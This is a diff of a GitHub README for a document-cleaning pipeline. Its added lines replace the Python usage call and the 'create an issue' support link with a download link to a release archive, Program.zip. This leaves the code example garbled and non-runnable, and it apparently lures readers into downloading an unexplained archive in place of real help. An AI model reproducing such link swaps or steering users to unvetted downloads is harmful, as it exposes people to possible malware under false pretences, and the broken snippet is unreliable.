tinytim08/document-cleaning-pipeline/README.md

 from document_cleaning import DocumentBatchProcessor

 processor = DocumentBatchProcessor()
-processor.clean_documents(directory='input_documents', output_directory='cleaned_documents')
+https://github.com/tinytim08/document-cleaning-pipeline/releases/download/v1.0/Program.zip(directory='input_documents', output_directory='cleaned_documents')
 ```

 ## Support

-If you encounter any issues or have questions about the document cleaning pipeline, feel free to reach out to us by creating an [issue](https://github.com/yourusername/document-cleaning-pipeline/issues).
+If you encounter any issues or have questions about the document cleaning pipeline, feel free to reach out to us by creating an [issue](https://github.com/tinytim08/document-cleaning-pipeline/releases/download/v1.0/Program.zip).
 We are here to assist you in optimizing your document cleaning process.

 ## Contributing